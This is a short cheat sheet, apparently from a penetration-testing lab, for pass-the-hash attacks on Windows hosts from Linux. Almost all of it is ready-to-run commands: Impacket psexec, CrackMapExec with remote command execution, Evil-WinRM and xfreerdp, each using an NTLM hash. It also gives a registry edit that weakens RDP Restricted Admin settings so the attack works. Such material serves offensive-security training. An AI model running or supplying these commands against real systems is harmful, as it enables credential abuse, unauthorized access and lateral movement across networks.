Using Linux

Using Impacket

  • impacket-wmiexec

  • impacket-atexec

  • impacket-smbexec

  • impacket-psexec

$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Using CrackMapExec

  • use --local-auth to authenticate as a local administrator account rather than a domain account

# crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
# crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

Using Evil-WinRM

  • use this if SMB is blocked or if we don't have administrative rights

  • when using a domain account, include the domain name, such as administrator@inlanefreight.htb

$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

Using RDP

  • Restricted Admin mode must be enabled on the target; if it is not, the connection fails with an error

  • to enable Restricted Admin mode, add this registry value (DisableRestrictedAdmin set to 0):

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Pass the hash using RDP

$ xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
